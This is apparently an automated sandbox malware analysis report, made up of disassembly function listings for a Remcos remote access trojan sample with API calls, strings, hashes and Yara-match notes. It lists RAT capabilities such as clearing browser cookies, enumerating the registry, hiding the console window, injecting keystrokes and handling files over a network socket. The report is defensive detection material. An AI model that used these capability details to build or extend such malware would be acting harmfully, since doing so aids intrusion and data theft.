                                                                                                                                                                    • String ID: tcp$udp
                                                                                                                                                                    • API String ID: 0-3725065008
                                                                                                                                                                    • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                                                                                                                    • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                                                                                                                                                    • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                                                                                                                    • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                                                                                    • ExitThread.KERNEL32 ref: 004018F6
                                                                                                                                                                    • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                                                                                                                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                                                    • String ID: PkG$XMG$NG$NG
                                                                                                                                                                    • API String ID: 1649129571-3151166067
                                                                                                                                                                    • Opcode ID: 1d3ff612d60dcdc4e0acc893d68db7ccaa0c14c88cd1a80318e69fe49614b045
                                                                                                                                                                    • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                                                                                                                                                    • Opcode Fuzzy Hash: 1d3ff612d60dcdc4e0acc893d68db7ccaa0c14c88cd1a80318e69fe49614b045
                                                                                                                                                                    • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                                                                                                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                                                                                                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                                                                                                                                                      • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                                                                                                                      • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                                                    • String ID: .part
                                                                                                                                                                    • API String ID: 1303771098-3499674018
                                                                                                                                                                    • Opcode ID: c2b99d59a5a8484969540797bd158b296de259178e7883faaa59f7cabbc877b8
                                                                                                                                                                    • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                                                                                                                                                    • Opcode Fuzzy Hash: c2b99d59a5a8484969540797bd158b296de259178e7883faaa59f7cabbc877b8
                                                                                                                                                                    • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                                                                                                                                                    • GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                                                                                                                                    • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Console$Window$AllocOutputShow
                                                                                                                                                                    • String ID: Remcos v$4.9.4 Pro$CONOUT$
                                                                                                                                                                    • API String ID: 4067487056-3065609815
                                                                                                                                                                    • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                                                                                                                                    • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                                                                                                                                                    • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                                                                                                                                    • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                                                                                                                                                    • __freea.LIBCMT ref: 0044AE30
                                                                                                                                                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                                                                                                                    • __freea.LIBCMT ref: 0044AE39
                                                                                                                                                                    • __freea.LIBCMT ref: 0044AE5E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3864826663-0
Uniqueness Score: -1.00%

APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
• SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
• SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
• SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
• SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
• SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
• SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
• SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Similarity
• API ID: InputSend
• String ID:
• API String ID: 3431551938-0
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Similarity
• API ID: __freea$__alloca_probe_16_free
• String ID: a/p$am/pm$zD
• API String ID: 2936374016-2723203690
Uniqueness Score: -1.00%

APIs
• RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
• RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Similarity
• API ID: Enum$InfoQueryValue
• String ID: [regsplt]$xUG$TG
• API String ID: 3554306468-1165877943
Uniqueness Score: -1.00%

APIs
• GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
• __fassign.LIBCMT ref: 0044B479
• __fassign.LIBCMT ref: 0044B494
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
• WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B4D9
• WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B512
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
Uniqueness Score: -1.00%

APIs
• GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,274C9C07,?,00000000,?,00000000,00000000), ref: 274C94D4
• __fassign.LIBCMT ref: 274C954F
• __fassign.LIBCMT ref: 274C956A
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 274C9590
• WriteFile.KERNEL32(?,?,00000000,274C9C07,00000000,?,?,?,?,?,?,?,?,?,274C9C07,?), ref: 274C95AF
• WriteFile.KERNEL32(?,?,00000001,274C9C07,00000000,?,?,?,?,?,?,?,?,?,274C9C07,?), ref: 274C95E8
Memory Dump Source
• Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
  • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
  • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Similarity
• API ID: CloseEnumInfoOpenQuerysend
• String ID: xUG$NG$NG$TG
• API String ID: 3114080316-2811732169
Uniqueness Score: -1.00%

APIs
• _ValidateLocalCookies.LIBCMT ref: 274C339B
• ___except_validate_context_record.LIBVCRUNTIME ref: 274C33A3
• _ValidateLocalCookies.LIBCMT ref: 274C3431
• __IsNonwritableInCurrentImage.LIBCMT ref: 274C345C
• _ValidateLocalCookies.LIBCMT ref: 274C34B1
Memory Dump Source
• Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                    • String ID: csm
                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                    • Opcode ID: 44b2bb140769ba4fbe4a6cfd05107a1ab392470c8c9d5187d1a13f598aaf479f
                                                                                                                                                                    • Instruction ID: 2c898ac8fbb935b4186f30abcfe434350982e4961eeba658f1eb3800452db358
                                                                                                                                                                    • Opcode Fuzzy Hash: 44b2bb140769ba4fbe4a6cfd05107a1ab392470c8c9d5187d1a13f598aaf479f
                                                                                                                                                                    • Instruction Fuzzy Hash: 4041B638A00208DBCB01CF68CC44ADEBBB5AF8522CF14815DD9159B351D7369A15CF9B
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                                                                                                                                                      • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                                                                                                                                                      • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                                                                                                                                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                                                                                                                      • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                                                                                                                    • _wcslen.LIBCMT ref: 0041B763
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                                                    • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                                                    • API String ID: 3286818993-122982132
                                                                                                                                                                    • Opcode ID: 7be9ddbdca4c236add55560158a3964ade8c49d0730efc843a2acc4574998768
                                                                                                                                                                    • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                                                                                                                                                    • Opcode Fuzzy Hash: 7be9ddbdca4c236add55560158a3964ade8c49d0730efc843a2acc4574998768
                                                                                                                                                                    • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                                                                                                                      • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                                                                                                                                      • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                                                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                                                                    • API String ID: 1133728706-4073444585
                                                                                                                                                                    • Opcode ID: 33945536062316160c63ff990a743b18c923748d39ad6fb90c9b27f0130b1a82
                                                                                                                                                                    • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                                                                                                                                                    • Opcode Fuzzy Hash: 33945536062316160c63ff990a743b18c923748d39ad6fb90c9b27f0130b1a82
                                                                                                                                                                    • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b15328f38de36e2236e67be376e02f2a3afc52644fcc3b23babb247561bddb00
                                                                                                                                                                    • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                                                                                                                                                    • Opcode Fuzzy Hash: b15328f38de36e2236e67be376e02f2a3afc52644fcc3b23babb247561bddb00
                                                                                                                                                                    • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                                                                                                                                                    • _free.LIBCMT ref: 00450F48
                                                                                                                                                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                                                                                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                                                                                                    • _free.LIBCMT ref: 00450F53
                                                                                                                                                                    • _free.LIBCMT ref: 00450F5E
                                                                                                                                                                    • _free.LIBCMT ref: 00450FB2
                                                                                                                                                                    • _free.LIBCMT ref: 00450FBD
                                                                                                                                                                    • _free.LIBCMT ref: 00450FC8
                                                                                                                                                                    • _free.LIBCMT ref: 00450FD3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                    • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                    • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                                                                                                                                                    • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                    • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 274C9221: _free.LIBCMT ref: 274C924A
                                                                                                                                                                    • _free.LIBCMT ref: 274C92AB
                                                                                                                                                                      • Part of subcall function 274C571E: HeapFree.KERNEL32(00000000,00000000,?,274C924F,?,00000000,?,00000000,?,274C9276,?,00000007,?,?,274C7E5A,?), ref: 274C5734
                                                                                                                                                                      • Part of subcall function 274C571E: GetLastError.KERNEL32(?,?,274C924F,?,00000000,?,00000000,?,274C9276,?,00000007,?,?,274C7E5A,?,?), ref: 274C5746
                                                                                                                                                                    • _free.LIBCMT ref: 274C92B6
                                                                                                                                                                    • _free.LIBCMT ref: 274C92C1
                                                                                                                                                                    • _free.LIBCMT ref: 274C9315
                                                                                                                                                                    • _free.LIBCMT ref: 274C9320
                                                                                                                                                                    • _free.LIBCMT ref: 274C932B
                                                                                                                                                                    • _free.LIBCMT ref: 274C9336
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                    • Instruction ID: dda3dcf89ba6e3c649a39e7320b097c8bad52c299d1e85cf9a8ca327e8f5d0cb
                                                                                                                                                                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                    • Instruction Fuzzy Hash: D6118139541B08FAD622EBB0DC46FDBBB9DAF94B10F400C2CA6DD76092DA34B6444752
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00411170
• int.LIBCPMT ref: 00411183
  • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
  • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
• std::_Facet_Register.LIBCPMT ref: 004111C3
• std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
• __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
• String ID: (mG
• API String ID: 2536120697-4059303827
• Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
• Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
• Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
• Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
• SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
